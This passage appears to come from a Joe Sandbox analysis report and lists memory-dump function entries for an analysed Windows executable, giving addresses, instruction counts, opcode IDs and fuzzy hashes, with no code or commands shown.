                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      • Opcode ID: fb5afa7e83816f87ad3bdb1e5bd3057140fa0dcd1efc4ce90fdbad9c247c2568
                                                                                                                                                                      • Instruction ID: 4ce5712c6b6dbd44962a8a6746c8a075f4d8998e014a72b1427c9c5eeae5b667
                                                                                                                                                                      • Opcode Fuzzy Hash: fb5afa7e83816f87ad3bdb1e5bd3057140fa0dcd1efc4ce90fdbad9c247c2568
                                                                                                                                                                      • Instruction Fuzzy Hash: B4B09220E0BA46C6EB482B216C8621422A47F48B00F994038C50D81320DE3C20B56704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E3690 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d3f78641df24769d705b0134685206bc5f9ca78e59f6fddb9ec423e4bd4151a
                                                                                                                                                                      • Instruction ID: 6807bfbcf9d1b3dbfa4a86d5b3b5761e45d78324baca54b875ffb7e1860bfbd5
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d3f78641df24769d705b0134685206bc5f9ca78e59f6fddb9ec423e4bd4151a
                                                                                                                                                                      • Instruction Fuzzy Hash: EED1CD63E0874686FB688A29805027D3BA0EF45B58F147235CE0E87795CF3DEE45E762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8F80 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 147d92bf8c69cf1b856be138069e08edad3a532e6dbae6759c0ef437899157f5
                                                                                                                                                                      • Instruction ID: 90d3dd22d4dd47ded0570b614efbd023f95c2e459cff50930eafd0dedbeb460d
                                                                                                                                                                      • Opcode Fuzzy Hash: 147d92bf8c69cf1b856be138069e08edad3a532e6dbae6759c0ef437899157f5
                                                                                                                                                                      • Instruction Fuzzy Hash: 36C117326142F04BE798EB29E45947A33E5F7A9309BD5403BEB874B785CA3CE414E750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E2D00 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 14559cf246afd361d58dafe0d2584ab9f073efdfb6141b8081588b00c2cbc866
                                                                                                                                                                      • Instruction ID: 1d675dcf0ddc01f28f6b2b74064bf63ad6fb65f187472d5a4e945e7481a7752f
                                                                                                                                                                      • Opcode Fuzzy Hash: 14559cf246afd361d58dafe0d2584ab9f073efdfb6141b8081588b00c2cbc866
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CB15A73D0C79585FB658F29C05022C3BA0E749B48F282136DB4E87395CF39DA46E761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EE9E0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: de4e625d11443468839699302f6427928d225114e5d5e833cf81a80f5f4de726
                                                                                                                                                                      • Instruction ID: d6546b8a17b1644ca68237b555d08467a384cfe9cd1301d401357f0d16d4e531
                                                                                                                                                                      • Opcode Fuzzy Hash: de4e625d11443468839699302f6427928d225114e5d5e833cf81a80f5f4de726
                                                                                                                                                                      • Instruction Fuzzy Hash: 46811773E0D78186FB74CB19948037A7A91FB45794F005239DA8E83B95DF3DEA10AB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F6C20 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 93e1b572973ddb4749f990ebe4e4193ccfe505291fa828401f493f174f614033
                                                                                                                                                                      • Instruction ID: ce941373c8a7b5733c91a8611d9480053ccd0bbedfc5c745708fba7cb01eb27a
                                                                                                                                                                      • Opcode Fuzzy Hash: 93e1b572973ddb4749f990ebe4e4193ccfe505291fa828401f493f174f614033
                                                                                                                                                                      • Instruction Fuzzy Hash: 7061CFA3E5C29246FB648A28C55077D67E1AF60760F184239EA7DC7BD1EE7DEC40A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E2254 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 52a02fcdcf92c0a2c9a35e836e6333fb64ecc70c5ed9b2f6572b25d33bf7c64b
                                                                                                                                                                      • Instruction ID: 736101e96743d39da94b772bce0e1c2697918562a65dd367c75184fa4e9f3681
                                                                                                                                                                      • Opcode Fuzzy Hash: 52a02fcdcf92c0a2c9a35e836e6333fb64ecc70c5ed9b2f6572b25d33bf7c64b
                                                                                                                                                                      • Instruction Fuzzy Hash: 52517077E1CB5182F7648B29C04027833A0EB58B58F246131CE8D977A5CF3AEE52EB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E1A34 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a4ee5e20bab15de11e4dd18ca9e8a43eac167d7c0a0227fcc00f18b96ee599bc
                                                                                                                                                                      • Instruction ID: ddd39488aea08d0a5f9f039370be1022ebb0bd71fc98c561d5c56d7c27fe5198
                                                                                                                                                                      • Opcode Fuzzy Hash: a4ee5e20bab15de11e4dd18ca9e8a43eac167d7c0a0227fcc00f18b96ee599bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 66519337E1875282FB248B29D040239B7A1EB44B68F246131CE4D977A4DF3AEE53D790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E1E44 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a148da24f8728c4afbbb5c35b1c62c1eac07cb27a590c1aedb906e23ad299329
                                                                                                                                                                      • Instruction ID: 4e3bc517474c2870a9923bbbd2d9bd74d3656f1db98a0393b72905a2261df8ad
                                                                                                                                                                      • Opcode Fuzzy Hash: a148da24f8728c4afbbb5c35b1c62c1eac07cb27a590c1aedb906e23ad299329
                                                                                                                                                                      • Instruction Fuzzy Hash: FE519437E1875286F7248B29C04063877A1EB99B68F246231DE4D97794CF3AEE43D790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E1C40 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1952aa752d02783d999143113e74aeee2381d9ff93f559de6217d8abf59dcb14
                                                                                                                                                                      • Instruction ID: 36b13ad82d0cb061a67c51e789d6d1fc962653723858651a5f2eba1655919693
                                                                                                                                                                      • Opcode Fuzzy Hash: 1952aa752d02783d999143113e74aeee2381d9ff93f559de6217d8abf59dcb14
                                                                                                                                                                      • Instruction Fuzzy Hash: E7518D37E1875186FB248B29C040679B7A1EB48F58F246131CE4D97794CF3AEE52E790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E2050 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9c17fc70a7b56fd02a5ca1026e37b800df55c6077b31342cc29fc41f29b3d3f7
                                                                                                                                                                      • Instruction ID: 77a7ae0bc1636eaf3ce8fd701fcdd8049126663989da9e65c534b8d9d40660e1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c17fc70a7b56fd02a5ca1026e37b800df55c6077b31342cc29fc41f29b3d3f7
                                                                                                                                                                      • Instruction Fuzzy Hash: 10518D77E1C75186F7248B29C0403382BA1EB48B58F246131DE4D97798CF3AEE42E760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E1830 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: eb81ed943fb456c2e4fa8acab1bbbe5cf5c103c9e469554e3c1d350ff46cf94f
                                                                                                                                                                      • Instruction ID: ed877b5694ef09c34c22b99251986c9e30a52947fd24af71c4b9ef04070df209
                                                                                                                                                                      • Opcode Fuzzy Hash: eb81ed943fb456c2e4fa8acab1bbbe5cf5c103c9e469554e3c1d350ff46cf94f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E518F77E2875186F7648B29C04027CA7A1EB85B58F286131DE4C97794CF3AEE42E790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E5DE0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                      • Instruction ID: b289f4a509cc0d3f173ffdc38e5af4ab10b6ae5aa5ff25ba42e70f0004fc0f72
                                                                                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                      • Instruction Fuzzy Hash: 0441946BC0974E85FB95891805047F866809FB2BA4D58B2B4DD9D933D3CD2D6F8BA220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EA2E0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2050971199-0
                                                                                                                                                                      • Opcode ID: bfff0811a15a915023ab11670dca90bdc9fb1efc7219989930cac6f8d01bc8cb
                                                                                                                                                                      • Instruction ID: 05e09bdfb7acbd114715a93e8df0cb4ba37e35b1fb0a53727ccfd5dca1b761a5
                                                                                                                                                                      • Opcode Fuzzy Hash: bfff0811a15a915023ab11670dca90bdc9fb1efc7219989930cac6f8d01bc8cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 9241F263B14B5482FF18CF2AD914169B3A1BB48FD0B09A032EE0DD7B58DE3DC6569300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E7B48 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c187981d331a6a91233bd4e04359b6f83347c1a7653188d879127cbaf6a695a0
                                                                                                                                                                      • Instruction ID: 79537c03438efb479ea12d26db7a8f4a4ee6bc3dbc0f5a08885bb873b9ace2e7
                                                                                                                                                                      • Opcode Fuzzy Hash: c187981d331a6a91233bd4e04359b6f83347c1a7653188d879127cbaf6a695a0
                                                                                                                                                                      • Instruction Fuzzy Hash: AA31F232F0CB4282FB64DB25644017E6AD5AF84B90F145239EA9D93B96DF3CD512A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F9CF0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 79c5c4b5da66e2686edcf107b1e8bea3b8f520f559de6c99910b1c64c117b8a4
                                                                                                                                                                      • Instruction ID: afc9ea9586b46785c3d2ce125f2e2c430d05809f39ccaf61f7b1de1278a2126b
                                                                                                                                                                      • Opcode Fuzzy Hash: 79c5c4b5da66e2686edcf107b1e8bea3b8f520f559de6c99910b1c64c117b8a4
